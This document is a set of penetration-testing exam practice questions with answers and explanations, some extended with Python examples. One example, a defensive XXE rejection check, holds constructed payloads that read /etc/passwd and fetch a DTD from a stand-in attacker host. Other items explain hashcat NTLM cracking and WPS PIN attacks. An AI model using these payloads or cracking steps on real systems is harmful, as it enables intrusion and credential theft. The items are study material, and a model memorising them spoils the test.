Q

During a wireless survey of a customer’s network, you discover multiple BSSIDs. In regard to wireless communications, what is the purpose of the BSSID?
A.Describes the MAC address of the wireless client
B.Describes the unique MAC address of the access point
C.Describes the name of the distributed system (DS)
D.Describes the name of the WLAN

A

B.Describes the unique MAC address of the access point

Explanation
Correct Answer: Describes the unique MAC address of the access point is correct. The Basic Service Set Identifier (BSSID) is used to describe the unique MAC address of the access point. This provides network clarity when multiple access points are on the same wireless local area network (WLAN) broadcasting the same SSID.

Incorrect Answers: Describes the name of the WLAN is incorrect because the Service Set Identifier (SSID) is the name given to the wireless network.

Describes the name of the distribution system (DS) is incorrect because the distribution system (DS) is used to connect multiple access points on the network.

Describes the MAC address of the wireless client is incorrect because a client's MAC address identifies the station, not the access point; the BSSID is the access point's MAC address.

37
Q
Given the following nmap output, which format was this file saved in?
A.ASCII output
B.CSV output
B.Grepable output
D.XML output
A

B.Grepable output

Explanation
Correct Answer: Grepable output is correct. The scan file was saved in nmap's grepable format (-oG). Each host's results appear on a single line beginning with Host:, with tab-separated fields such as Status: and Ports:, so the file can be searched and parsed with standard tools like grep, awk, cut, sed, diff, and Perl. The format is most easily recognized by its port entries, which are separated by commas and whose sub-fields (port/state/protocol/owner/service/rpc/version) are separated by slashes.

Incorrect Answers: XML output (-oX) is incorrect because the file would consist of nested tagged elements (host, ports, port) in Extensible Markup Language, which resembles HTML in structure.

ASCII (normal) output (-oN) is incorrect because it is the human-readable report nmap prints to the terminal, without field delimiters designed for parsing.

CSV output is incorrect because nmap has no native CSV (comma-separated) output option; CSV is produced, if needed, by converting the XML or grepable output.
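The grepable layout described above is regular enough to parse without a library. The parser below is an added example, not code from the original page; the scan file it reads is a constructed sample in the -oG layout (two hosts, one of them named dns1 to match the page's earlier scenario), not the output the question refers to.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of nmap grepable (-oG) output, not the scan file from the
# original page. Fields are tab-separated; port entries are separated by ", "
# and their sub-fields by "/".
SAMPLE_GNMAP = """# Nmap 7.80 scan initiated Mon Jan  6 10:00:00 2020 as: nmap -sS -sU -oG scan.gnmap 192.0.2.0/29
Host: 192.0.2.10 ()\tStatus: Up
Host: 192.0.2.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: filtered (997)
Host: 192.0.2.11 (dns1)\tStatus: Up
Host: 192.0.2.11 (dns1)\tPorts: 53/open/tcp//domain///, 161/open|filtered/udp//snmp///
# Nmap done at Mon Jan  6 10:00:05 2020 -- 8 IP addresses (2 hosts up) scanned in 5.00 seconds
"""

HOST_RE = re.compile(r"Host: (\S+) \((.*?)\)")
PORT_RE = re.compile(r"(\d+)/([^/]+)/([^/]+)/")   # port/state/protocol/...


def parse_gnmap(text: str) -> Dict[str, dict]:
    """Map each IP to its hostname, status and a list of (port, state, proto)."""
    hosts: Dict[str, dict] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):      # skips the "# Nmap ..." comment lines
            continue
        fields = line.split("\t")
        m = HOST_RE.match(fields[0])
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        entry = hosts.setdefault(ip, {"hostname": hostname, "status": None, "ports": []})
        for field in fields[1:]:
            if field.startswith("Status: "):
                entry["status"] = field[len("Status: "):]
            elif field.startswith("Ports: "):
                for spec in field[len("Ports: "):].split(", "):
                    pm = PORT_RE.match(spec)
                    if pm:
                        entry["ports"].append((int(pm.group(1)), pm.group(2), pm.group(3)))
    return hosts


def open_ports(hosts: Dict[str, dict], proto: str = "tcp") -> Dict[str, List[int]]:
    """Ports whose state is exactly 'open' (so 'open|filtered' UDP ports are excluded)."""
    return {
        ip: sorted(p for p, state, pr in h["ports"] if pr == proto and state == "open")
        for ip, h in hosts.items()
    }


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    for ip, ports in open_ports(scan).items():
        print(ip, scan[ip]["hostname"] or "-", ports)
```

The same approach generalizes to any -oG file: only the Host: lines carry data, and every additional field (Ignored State:, OS:, Seq Index:) is just another tab-separated key/value pair that the loop can be extended to capture.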

38
Q

During the internal portion of a pentest, you notice an executable called newcmd.exe in the C:\Windows\Temp folder of one of your targets. The executable is also in the process listing, running with SYSTEM privileges and consuming a great deal of hardware resources on the host. You consult with your team, and no one else has touched this target. What is the best course of action for this scenario?
A.Remove the executable and inform the customer
B.Conduct malware analysis against the executable
C.Inform the customer immediately of the potential compromise
D.Include the incident in the pentest report, but dont bother the customer at this time

A

C.Inform the customer immediately of the potential compromise

Explanation
Correct Answer: Inform the customer immediately of the potential compromise is correct. Given a scenario that may require deconfliction, your pentest team may need to sort out the pentest artifacts from the artifacts of a real compromise.

Incorrect Answers: Include the incident in the pentest report, but don't bother the customer at this time is incorrect because due diligence for the customer means letting them know promptly about suspicious activity that did not come from you. As a pentester, your role is to emulate the adversary; however, honesty and integrity are two character traits that your customers will both respect and appreciate.

Conduct malware analysis against the executable is incorrect because the customer will want to conduct their own investigation and, if necessary, their own incident response.

Remove the executable and inform the customer is incorrect because removing the executable from the host could be bad, especially if it was a legitimate program. You always want to respect the rights of the customer and maintain communication on any potential issues that may arise during the pentest.

39
Q

Hiding or obfuscating the IDOR parameter in a web response from the server will help do which of the following?
A.PRevent the parameter from being injectable
B.Provide access controls for the web application
C.Stop an attacker from exfiltrating sensitive data from an application or database
D.Prevent guessing/brute-force attacks

A

D.Prevent guessing/brute-force attacks

Explanation
Correct Answer: Prevent guessing/brute-force attacks is correct. An insecure direct object reference (IDOR) is an access control flaw: the application exposes a direct reference to an internal object (a sequential record ID, a file name) and acts on it without verifying that the requester is authorized to access that object. A predictable reference also reveals what the application is doing behind the scenes, such as retrieving or manipulating a specific database record, so an attacker can enumerate other users' records simply by changing the value. Hiding or obfuscating the parameter (an unguessable, randomized reference) removes that predictability and makes guessing or brute-forcing requests harder; it does not by itself fix the missing authorization check.

Incorrect Answers: Stop an attacker from exfiltrating sensitive data from an application or database is incorrect because obfuscating the reference does not stop an attacker who already holds a valid reference, or obtains one through another channel, from retrieving the data; it only increases the difficulty of discovering references.

Prevent the parameter from being injectable is incorrect because obfuscation hides something; it doesn't fix a security issue such as a parameter being susceptible to an injection attack.

Provide access controls for the web application is incorrect because obfuscation only hides what is there; only a server-side authorization check on every object access provides access control.
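To make the distinction above concrete, the following added example (not code from the original page) puts a vulnerable object lookup, its authorized counterpart, and an obfuscated-reference front end side by side and then enumerates IDs against each. The invoice table, the user names and the server secret KEY are all constructed, hypothetical values.

```python
import hashlib
import hmac
from typing import Callable, Dict, List

# Constructed sample data: invoices keyed by a sequential ID, each owned by one user.
INVOICES: Dict[int, dict] = {
    1001: {"owner": "alice", "amount": 120.0},
    1002: {"owner": "bob",   "amount": 890.5},
    1003: {"owner": "alice", "amount": 15.0},
}


class Forbidden(Exception):
    pass


def get_invoice_vulnerable(user: str, invoice_id: int) -> dict:
    # IDOR: trusts the client-supplied ID and never checks who owns the record.
    return INVOICES[invoice_id]


def get_invoice_authorized(user: str, invoice_id: int) -> dict:
    # The fix: decide authorization server-side on every object access.
    inv = INVOICES.get(invoice_id)
    if inv is None or inv["owner"] != user:
        raise Forbidden(f"{user} may not read invoice {invoice_id}")
    return inv


# The obfuscation the question refers to: expose a keyed, unguessable reference
# instead of the sequential ID. KEY is a hypothetical server-side secret.
KEY = b"hypothetical-server-side-secret"


def opaque_ref(invoice_id: int) -> str:
    return hmac.new(KEY, str(invoice_id).encode(), hashlib.sha256).hexdigest()[:16]


_REF_INDEX = {opaque_ref(i): i for i in INVOICES}


def get_invoice_by_ref(user: str, ref: str) -> dict:
    invoice_id = _REF_INDEX.get(ref)
    if invoice_id is None:
        raise Forbidden("unknown reference")
    # Obfuscation raises the cost of guessing; ownership is still enforced here.
    return get_invoice_authorized(user, invoice_id)


def enumerate_ids(user: str, handler: Callable[[str, int], dict],
                  start: int = 1000, stop: int = 1010) -> List[int]:
    """What an attacker's ID-walking loop sees through a given handler."""
    found = []
    for i in range(start, stop):
        try:
            handler(user, i)
            found.append(i)
        except (KeyError, Forbidden):
            pass
    return found


if __name__ == "__main__":
    print("bob via vulnerable handler:", enumerate_ids("bob", get_invoice_vulnerable))
    print("bob via authorized handler:", enumerate_ids("bob", get_invoice_authorized))
```

Walking 1000..1009 through the vulnerable handler returns every invoice in the table, while the authorized handler returns only bob's own. The opaque reference makes that walk infeasible, but note that get_invoice_by_ref still calls the ownership check: a leaked or shared reference would otherwise be just as exploitable as a sequential ID.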

40
Q

During an engagement, the customer has requested that you throttle your active scanning techniques against specific legacy network components. Which of the following options might have caused the customer to have concern about scanning of its legacy assets? (Choose two.)
A.Service interruptions
B.Limited number of users on network
C.Low-bandwidth connections
D.They are not managed by the organization

A

A.Service interruptions
C.Low-bandwidth connections

Explanation
Correct Answers: Low-bandwidth connections and service interruptions are correct. Organizations that operate legacy networks may have low-bandwidth links and aging devices, so aggressive scanning is more likely to saturate those links or crash fragile services; throttling the scan reduces that risk.

Incorrect Answers: They are not managed by the organization is incorrect because the customer has not stated that you can’t target the legacy assets, but rather has just requested that you throttle the scan activity against the legacy assets.

Limited number of users on a network is incorrect because the customer did not share any concern regarding users on the legacy networks, as that constraint would likely have applied to other parts of the network as well in regard to scanning.

41
Q

After successfully compromising user credentials on a Linux workstation, you would like to run Mozilla Firefox back to your attack host so that you can browse web content that is only available from intranet web servers within the local network. Which option would help facilitate the connectivity over a secure channel?
A.Telnet to the host and use ‘setenv DISPLAY’ back to the attack host
B.Execute ‘xhost +’ on your attack host, then use ‘ssh -x’ to connect to the target host and launch Firefox
C.Use ‘ssh -vv’ to the target host and launch Firefox
D.Ensure X11 forwarding is enabled and supported on the target host and your attack host, then use ‘ssh -X’ to connect to the target host and then launch Firefox

A

D.Ensure X11 forwarding is enabled and supported on the target host and your attack host, then use ‘ssh -X’ to connect to the target host and then launch Firefox

Explanation
Correct Answer: Ensure X11 forwarding is enabled and supported on the target host and your attack host, then use ssh -X to connect to the target host, and then launch Firefox is correct. The X Window System (X11) provides the framework for graphical user interface (GUI) applications on Unix/Linux. For Firefox's window to appear on your attack host, the SSH server on the target must permit X11 forwarding (X11Forwarding yes in sshd_config), and the attack host needs a running X server and an SSH client that requests forwarding with ssh -X (or -Y for trusted forwarding). Firefox then executes on the target, so its web requests originate inside the intranet, while its display is tunneled back to you over the encrypted SSH channel.

Incorrect Answers: Telnet to the host and use setenv DISPLAY back to the attack host is incorrect because Telnet is not a secure protocol, and pointing DISPLAY at your host would send the X traffic in the clear as well.

Execute xhost + on your attack host, then use ssh -x to connect to the target host and launch Firefox is incorrect both because xhost + is unnecessary with SSH X11 forwarding (and disables your X server's access control entirely) and because -x (lowercase) disables X11 forwarding rather than enabling it. Use ssh -vv to the target host and launch Firefox is incorrect because -vv only raises the verbosity of SSH's debug output.

42
Q
The following code was used to exploit a target web server during a pentest. What type of attack did this exploit take advantage of?``` ]> &xxe; mypass```
A.RFI
B.XXE Injection
C.Path traversal attack
D.LFI
A

B.XXE Injection

Explanation
Correct Answer: XXE injection is correct. The XML declares an external entity whose value the parser fetches when the entity is referenced; the `Expect()` module the payload relies on is the PHP expect:// stream wrapper (available only when the PECL Expect extension is installed), which executes a system command on the web server and returns its output. Abusing an external entity this way is XML External Entity (XXE) injection.

Incorrect Answers: Path traversal attack is incorrect because the XML does not walk the server's file system (for example with ../ sequences) to reach files outside the web root.

RFI is incorrect because the XML does not include a remote file or script from an attacker-controlled web server.

LFI is incorrect because the XML does not include a local file; it executes a system command. An external entity pointing at a file:// URI would instead behave like a local file read.
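Whatever the entity points at (expect://, file://, or an attacker's URL), the attack needs the parser to accept a DTD with entity declarations, so the robust server-side fix is to refuse any such document before it reaches the parser. The check below is an added example, not code from the page or from the exploited application; its XXE sample is a constructed, textbook file-read payload rather than the page's payload.

```python
import re
import xml.etree.ElementTree as ET


class UnsafeXML(ValueError):
    """Raised when a document carries DTD or entity declarations."""


# Matches "<!DOCTYPE" and "<!ENTITY" (case-insensitive, optional whitespace);
# it does not match comments such as "<!-- ... -->".
_DTD_RE = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def parse_xml_no_dtd(data: bytes) -> ET.Element:
    """Parse untrusted XML, rejecting any document that declares a DTD or entities.
    Rejecting is deliberately conservative: a DOCTYPE inside CDATA text would be
    refused too, which is the safe failure mode for an input handler."""
    if _DTD_RE.search(data):
        raise UnsafeXML("DTD/entity declaration rejected")
    return ET.fromstring(data)


def is_rejected(data: bytes) -> bool:
    try:
        parse_xml_no_dtd(data)
        return False
    except UnsafeXML:
        return True


# Constructed inputs for the demonstration.
CLEAN = b"<?xml version='1.0'?><login><user>alice</user></login>"
XXE_FILE_READ = (b"<?xml version='1.0'?>"
                 b"<!DOCTYPE login [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"
                 b"<login><user>&xxe;</user></login>")
XXE_PARAMETER_ENTITY = (b"<?xml version='1.0'?>"
                        b"<!doctype login [<!entity % dtd SYSTEM 'http://attacker.invalid/x.dtd'> %dtd;]>"
                        b"<login><user>bob</user></login>")

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN), ("file read", XXE_FILE_READ),
                       ("parameter entity", XXE_PARAMETER_ENTITY)):
        print(f"{label}: {'rejected' if is_rejected(doc) else 'parsed'}")
```

For Python services the usual answer is the defusedxml package, which disables entity expansion and external references inside the parser; the explicit pre-check above makes the policy visible in the request handler and works regardless of which parser sits behind it.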

43
Q

Communication triggers are important indicators of when the pentester (or pentest team) should reach out to the customer. Which of the following examples could trigger a conversation with the customer? (Choose two.)
A.Using tools or methodologies not documented in the RoE
B.Using SQLmap against a production database server when the risk or outcome is unknown
C.Executing a command injection vulnerability in a customers non production environment that is in scope for the pentest
D.Running a port scan against a legacy network that was already documented in the RoE

A

A.Using tools or methodologies not documented in the RoE
B.Using SQLmap against a production database server when the risk or outcome is unknown

Explanation
Correct Answers: Using SQLmap against a production database server when the risk or outcome is unknown and using tools or methodologies not documented in the RoE are correct. Communication triggers are important indicators of when the pentester (or pentest team) should reach out to the customer. A few of those indicators include critical findings, completing certain stages (testing activities or milestones) in the engagement, embarking on a potentially risky test (for example, executing a potential SQL injection against a production web application), indicators of prior compromise, and using tools or methodologies not documented in the RoE.

Incorrect Answers: Executing a command injection vulnerability in a customer’s non-production environment that is in scope for the pentest is incorrect because the customer’s non-production environment is in scope for the assessment, and executing a command injection against a non-production environment will have little impact on the organization. Customers with this type of environment would prefer the pentester to run a test against non-production assets to evaluate the impact, rather than testing in a production environment where, if something goes wrong, bad things could happen.

Running a port scan against a legacy network that was already documented in the RoE is incorrect because the legacy network was already documented in the RoE, so the customer assumes the risk of the port scan, as this would be an approved methodology in the RoE in order to evaluate the network attack surface.

44
Q

During a pentest, your team successfully exploited an external-facing vulnerability and obtained user-level privileges on the customer’s internal network. From there, your team successfully compromised the NTLM password hash for the local system administrator account but couldn’t crack the hash. What remediation guidance would you offer to the customer as part of the post-exploitation testing narrative in the pentest report?
A.Inform the customer they are following good password security practices
B.Don’t change password since the plaintext value of the hash was not recovered
C.Ask the customer for the password to verify password complexity requirements
D.Consider the password and hash compromised and change the password regardless

A

D.Consider the password and hash compromised and change the password regardless

Explanation
Correct Answer: Consider the password and hash compromised and change the password regardless is correct. Given enough time and resources, the hash could be cracked: the offline attack might take 180 days, by which point the password may have been rotated, or it might take a day. Independently of cracking, and depending on the configuration of the Windows network, the NTLM hash can be replayed over the network using the pass-the-hash (PtH) lateral movement technique, and because the hash belongs to an administrator account it raises the impact of any further compromise.

Incorrect Answers: Don’t change password since the plaintext value of the hash was not recovered is incorrect because that is a decision the customer should make, not the pentester. The customer can take the proper course of action based on their risk appetite, but a pentester’s responsibility is to report the facts from the engagement.

Inform the customer they are following good password security practices is incorrect because the customer may be following good password security practices; however, knowing the plaintext value of the password is only part of the issue. If an attacker could replay the NTLM hash over the network, they may be able to install/leverage additional tools on other hosts (such as Mimikatz to recover plaintext passwords from memory), and then the hash is no longer needed.

Ask the customer for the password to verify password complexity requirements is incorrect because complexity requirements can be verified from the password policy; the pentester does not need, and should not ask for, the plaintext password.

45
Q

During a pentest, you identify a wireless access point that is configured to use a WPA2 PSK as well as WPS. Why would you want to use a tool like Reaver to attack WPS instead of attempting to capture the four-way handshake from a wireless client using the Aircrack-ng utilities and then crack the PSK offline?
A.You should not use Reaver to recover the WPS PIN when you can recover the PSK, as it is trivial to recover the plaintext value of the PSK using the four-way handshake and a simple dictionary
B.Reaver attacks a WPS implementation weakness in the registrar; however, the PSK can be recovered if Reaver can recover the four-way handshake
C.Reaver can be used to attack weaknesses in WPS and is capable of recovering the PSK through offline attacks
D.IF you can recover the WPS PIN, the router will give you plaintext value of the PSK. If the PSK is a strong password, it may take awhile to crack offline

A

D.IF you can recover the WPS PIN, the router will give you plaintext value of the PSK. If the PSK is a strong password, it may take awhile to crack offline

Explanation
Correct Answer: If you can recover the WPS PIN, the router will give you the plaintext value of the PSK. If the PSK is a strong password, it may take a while to crack offline is correct. Reaver attacks a weakness in the WPS registrar protocol: the 8-digit PIN is validated in two halves (four digits, then three, the last digit being a checksum), so at most about 11,000 attempts are needed rather than 100 million. Once the PIN is accepted, the access point's registrar hands over the WPA2 PSK in plaintext, so no offline cracking is required. If the access point is not susceptible (many rate-limit or lock WPS after repeated failures), capturing the four-way handshake and cracking it offline may be warranted.

Incorrect Answers: Reaver attacks a WPS implementation weakness in the registrar; however, the PSK can be recovered if Reaver can recover the four-way handshake is incorrect because Reaver does not support features to recover the four-way handshake during the wireless authentication process.

Reaver can be used to attack weaknesses in WPS and is capable of recovering the PSK through offline attacks is incorrect because Reaver does not support offline attack capabilities to recover the plaintext value of the PSK.

You should not use Reaver to recover the WPS PIN when you can recover the PSK, as it is trivial to recover the plaintext value of the PSK using the four-way handshake and a simple dictionary is incorrect because the PSK can be of any length and difficult to crack using just a simple dictionary. Recovering the plaintext value of the PSK may require additional time and computing resources.

46
Q
In the statement of work (SOW) document, the scope of work defines which of the following?
A.TImeline for the pentest
B.Reason for the pentest
C.Pentest artifacts
D.Work activities to be completed
A

D.Work activities to be completed

Explanation
Correct Answer: Work activities to be completed is correct. The scope of work defines the work activities (objectives) to be completed. The scope is necessary so that the pentest team knows prior to testing what will be involved during the engagement, such as if travel is required, and which particular attack vectors or methodologies the organization would like to have tested.

Incorrect Answers: Pentest artifacts is incorrect because the pentest artifacts are captured in the pentest report.

Timeline for the pentest is incorrect because the SOW period of performance specifies the timeline for the project.

Reason for the pentest is incorrect because the SOW purpose defines the reason for the pentest.

47
Q
During the active scanning phase of the internal PCI DSS pentest, you discover a Windows XP SP1 host on the customer's legacy network, which looks to be part of the point-of-sale system. Which of the following Microsoft (MS) bulletins are applicable to the Windows XP SP1 operating system, that are susceptible to vulnerabilities you could likely exploit remotely against the target to get a SYSTEM-level shell? (Choose two.)
A.MS06-040
B.MS10-087
C.MS08-067
D.MS10-092
A

A.MS06-040
C.MS08-067

Explanation
Correct Answers: MS06-040 and MS08-067 are correct. Both bulletins document an unauthenticated remote code execution vulnerability in the Windows Server service, reachable over SMB, that affects older Microsoft operating systems such as Windows XP SP1 and can be exploited remotely to run arbitrary code with SYSTEM privileges.

Incorrect Answers: MS10-092 is incorrect because the MS10-092 documents a vulnerability with the Windows Task Scheduler that allows for local privilege escalation.

MS10-087 is incorrect because MS10-087 documents a vulnerability in Microsoft Office that is remotely exploitable but would only provide user-level privileges.

48
Q

During a pentest, you are able to establish a foothold in the customer’s network on a Linux host inside the DMZ, behind the external firewall. You want to set up a SOCKS connection using SSH and Proxychains to do TCP and UDP scanning from the compromised Linux host. What type of proxy should you use in this scenario?

A.SOCKS4
B.SOCK PROXY
C.SOCKS4a
D.SOCKS5

A

D.SOCKS5

Explanation
Correct Answer: SOCKS5 is correct. Every SOCKS version relays TCP connections, but only SOCKS5 (RFC 1928) defines the UDP ASSOCIATE command that lets a client relay UDP datagrams through the proxy and receive the responses. In practice, check what the tooling actually implements: OpenSSH's dynamic forwarding (ssh -D) accepts SOCKS4 and SOCKS5 clients but only supports the CONNECT command, so UDP scans will not traverse it; Proxychains itself only redirects TCP sockets; and nmap must be run as a full connect scan (-sT) because raw SYN packets bypass the proxy.

Incorrect Answers: SOCKS4 and SOCKS4a are incorrect because SOCKS4 and SOCKS4a (an extension of SOCKS4 that adds remote DNS resolution) support only TCP connections.

SOCK PROXY is incorrect because SOCK PROXY is not a valid proxy type.

49
Q
During an ICMP discovery scan on the customer's LAN, you find that the target hosts are not responding, which could be due to the local Windows firewall settings on the hosts. Which of the following nmap command options could you use to aid in the discovery of hosts on the LAN? (Choose three.)
A.'-Pn'
B.'-sU'
C.'-sL'
D.'-sS'
A

A.'-Pn'
B.'-sU'
D.'-sS'

Explanation
Correct Answers: '-Pn', '-sS', and '-sU' are correct. -Pn skips nmap's host discovery and treats every address as alive, so the scan proceeds even when ICMP echo requests are dropped; -sS then port-scans TCP and -sU port-scans UDP, and any host that answers a probe (with SYN/ACK, RST, a UDP reply, or an ICMP port unreachable) is thereby confirmed to be up. Both -sS and -sU need raw-socket privileges (root or equivalent), and because -Pn removes the discovery filter, limit the port list (for example with --top-ports) to keep a /24 scan tractable.

Incorrect Answer: '-sL' is incorrect. The list scan only enumerates the targets (performing reverse-DNS lookups) without sending probes to them; given 192.168.1.0/24, nmap simply prints the addresses in that range.

50
Q
A JTAG can be used for which of the following?
A.Jailbreaking
B.Rooting Android devices
C.Debugging embedded devices
D.Application debugging
A

C.Debugging embedded devices

Explanation
Correct Answer: Debugging embedded devices is correct. JTAG (IEEE 1149.1) is a hardware test and debug interface: through its test access port (the TMS, TCK, TDI and TDO pins) a debugger can halt the processor, read and write memory and registers, and dump or rewrite firmware on an embedded board, which is why pentesters look for unlabelled JTAG headers on IoT and network hardware.

Incorrect Answers: Application debugging, jailbreaking, and rooting Android devices are incorrect because those are software-level activities carried out through the operating system or application tooling (debuggers, adb, software exploits), not through a hardware debug port.

51
Q
During a pentest, you successfully recover NTLM hash values for most of the users in an Active Directory domain; however, you are unable to execute PtH attacks due to environmental restrictions. Therefore, you decide to use the `hashcat` utility to crack the hashes offline. Which `hashcat` mode will you use to crack the hashes?
A.'-m 0'
B.'-m 1000'
C.'-m 300'
D.'-m 2500'
A

B.’-m 1000’

Explanation
Correct Answer: '-m 1000' is correct. Hashcat selects the hash algorithm with a numeric mode, and mode 1000 is NTLM: the NT hash stored by Windows, an unsalted MD4 of the password encoded as UTF-16LE. Because there is no salt and no iteration, a single candidate guess is hashed once and compared against every recovered hash, which is what makes offline NTLM cracking so fast. A typical invocation is hashcat -m 1000 -a 0 nt_hashes.txt wordlist.txt -r rules/best64.rule, with one hash per line (or user:hash together with --username).

Incorrect Answers: '-m 2500' is incorrect because that mode is WPA/WPA2 (EAPOL handshakes); current hashcat releases supersede it with mode 22000, which covers both handshakes and PMKIDs.

'-m 300' is incorrect because that mode is MySQL4.1/MySQL5. The LAN Manager (LM) hash that this distractor is presumably aimed at is mode 3000; LM hashes, where a legacy system still stores them, are even weaker than NTLM (the password is upper-cased and split into two 7-character halves), but they are not what was recovered here.

'-m 0' is incorrect because that mode is raw MD5.

52
Q
Company ABC has asked you to simulate the behavior of an individual who has authorized access to the company's network. Which type of threat actor is the company referring to?
A.Hacktivist
B.Advanced Persistent Threat
C.Insider threat
D.Script kiddie
A

C.Insider threat

Explanation
Correct Answer: Insider threat is correct. The insider threat would simulate the attack behavior of a user or privileged user operating from within the company’s network. For example, this type of testing can help an organization better understand valid attack vectors or the attack surface of the network given user-level access to the network.

Incorrect Answers: Hacktivists, script kiddies, and advanced persistent threats (APTs) are typically external threat actors, with minimal knowledge of a company compared to an insider threat.

53
Q
A long-running, persistent mechanism that can run as a background process on a target Linux server is known as what?
A.Script
B.Executable
C.Daemon
D.Cronjob
A

C.Daemon

Explanation
Correct Answer: Daemon is correct. A daemon is a long-running program, usually started at boot by the init system (systemd, SysV init) or launched by another program, that runs as a background process detached from any terminal rather than under the direct control of an interactive user. For a pentester it is the natural shape for a persistence mechanism on Linux, for example a malicious systemd unit or init script, which is why newly registered services are worth checking during post-exploitation and incident response.

Incorrect Answers: Script is incorrect because a script is not in itself long-running or persistent: it executes under the control of a user or another process (such as a cron job), performs its tasks, and terminates.

Executable is incorrect because an executable is just a file containing a program; it does nothing until a user or process starts it, and running it does not by itself make it a persistent background process.

Cronjob is incorrect because a cron job is a scheduled task, not a long-running process; cron itself is the daemon, and each job it launches runs to completion and exits.

54
Q

During a pentest, you discover users and admins are following poor password-generation practices on the domain, such that passwords are either guessable or subject to dictionary attacks. Which of the following BEST describes the appropriate remediation guidance for the customer?
A.Moving to using 2FA or RADIUS to reduce the risk of passwords getting compromised
B.Change passwords for all users and admins after enforcing a new password complexity requirement on the domain
C.Incorporate a stronger password complexity policy on the domain
D.Provide training to improve oversight of and compliance with organizational password policy requirements

A

B.Change passwords for all users and admins after enforcing a new password complexity requirement on the domain
Explanation
Correct Answer: Change passwords for all users and admins after enforcing a new password complexity requirement on the domain is correct. Recommending that a new password policy be enforced on the domain is essential, as most of the passwords for both admin and user accounts were susceptible to dictionary-based attacks. Then, having all users and admins change their passwords after the policy is in place ensures that every existing password actually meets the new requirement; a stricter policy is only applied when a password is set, so the weak passwords would otherwise remain valid until they expire. Practitioner note: current guidance (NIST SP 800-63B) weights length and screening against lists of known-breached passwords above character-class composition rules, so "complexity" is best implemented as a longer minimum length plus a banned-password filter, which addresses dictionary attacks directly.

Incorrect Answers: Incorporate a stronger password complexity policy on the domain is incorrect because a stronger policy is only part of the solution. Users and admins need to change their passwords before the new policy has any effect on the credentials that were already cracked.

Provide training to improve oversight of and compliance with organizational password policy requirements is incorrect because training improves awareness and compliance but is not a technical control; it does not by itself remove the passwords that are currently susceptible to dictionary-based attacks.

Move to using 2FA or RADIUS to reduce the risk of passwords getting compromised is incorrect because it introduces a solution whose implementation cost for every domain account is out of proportion to the finding, and RADIUS is an AAA transport protocol rather than a control on password strength; a second factor is a worthwhile longer-term recommendation, but it does not remediate weak passwords.

55
Q
The SOW includes information pertaining to all EXCEPT which of the following subjects?
A.Scope of work
B.Period of performance
C.Allocation of risk
D.Location of work
A

C.Allocation of risk

Explanation
Correct Answer: Allocation of risk is correct. The allocation of risk is a provision within the master service agreement (MSA) that defines levels of responsibility between each party.

Incorrect Answers: Location of work is incorrect because the SOW includes where exactly the work activities are to be performed.

Period of performance is incorrect because the timeline for the project is essential to include in the SOW so that the vendors providing the service and the customer receiving the service can plan for each activity accordingly.

Scope of work is incorrect because the scope of the work to be completed is needed so both the vendor and the customer can agree on the expectations for the project.

56
Q

During a pentest, you were successful with gaining remote user-level access to a Windows 10 host on the ABC Active Directory domain. The customer utilizes sophisticated intrusion detection capabilities. Part of the RoE suggests utilizing attack techniques that might go undetected. Which of the following would be the BEST choice when carrying out additional attacks from the compromised host?
A.Leverage native capabilities from the host and try to blend in with normal activity until you get a feel for how the intrusion detection capabilities are configured
B.Copy tools such as pwdump.exe and ncat.exe over to a staging area on the local file system and start planning an attack strategy
C.Establish a foothold on the target using the Empire framework, in order to further exploit the Active Directory domain
D.Use msfvenom to generate a Meterpreter payload for the compromised target then copy over to the local file system and execute the payload to get a reverse encrypted shell to use for interacting with the target

A

A.Leverage native capabilities from the host and try to blend in with normal activity until you get a feel for how the intrusion detection capabilities are configured

Explanation
Correct Answer: Leverage native capabilities from the host and try to blend in with normal activity until you get a feel for how the intrusion detection capabilities are configured is correct. Given the current scenario, it is unknown how sophisticated the customer’s defense capabilities are. Gaining situational awareness is a critical step in the post-exploitation phase and can help a pentester gather important knowledge of the host and internal network. Once you know how the system and environment are configured, you can start planning your next position of attack, such as if an exploitation framework is safe to use, which exploits or attacks could trigger unnecessary alarms/alerts on the network, and so on.

Incorrect Answers: Copy tools such as pwdump.exe and ncat.exe over to a staging area on the local file system and start planning an attack strategy is incorrect because there is not enough information provided to determine if those actions can support post-exploitation capabilities without being detected.

Use msfvenom to generate a Meterpreter payload for the compromised target, then copy over to the local file system, and execute the payload to get a reverse, encrypted shell to use for interacting with the target is incorrect because putting unnecessary executables or exploits on a local file system could trigger the antivirus software. It may not quarantine the files, but it could send an alert of a potentially unwanted program (PUP).

Establish a foothold on the target using the Empire framework, in order to further exploit the Active Directory domain is incorrect because it is best to wait until you gain situational awareness of the environment and surroundings before carrying out an attack strategy without a well-thought-out plan.

57
Q
During a pentest, you discover that the customer's web application logic that is used to manage user information is flawed. When a user creates an account in the application, the application writes out a file to the local operating system. The information from the file is parsed in near-real time by another process that auto-generates the effective unique user ID and privileges for that user. The programming logic sleeps for two seconds during the parsing process, which could be enough time for an attacker to modify the file to cause a DoS or possibly escalate privileges on the system. What is the type of vulnerability described in this scenario best known as?
A.SQLi
B.Race condition
C.Privilege escalation
D.Command injection
A

B.Race condition

Explanation
Correct Answer: Race condition is correct. A race condition is a type of behavior where the output depends on the sequence or timing of events the program does not control. It becomes a vulnerability when events do not happen in the order the programmer intended or when unexpected events intervene during the intended sequence. The scenario is the classic time-of-check to time-of-use (TOCTOU) form: the application writes a file, waits two seconds, and then trusts whatever is at that path when the parser reads it, so anyone who can write to the file during the window controls the user ID and privileges that get provisioned, or can corrupt the file to crash the parser (DoS).

Incorrect Answers: Privilege escalation is incorrect because privilege escalation is the outcome of exploiting the flaw, not the flaw itself.

Command injection and SQLi are incorrect because command injection and SQL injection vulnerabilities are the result of failing to validate input data, not of timing.
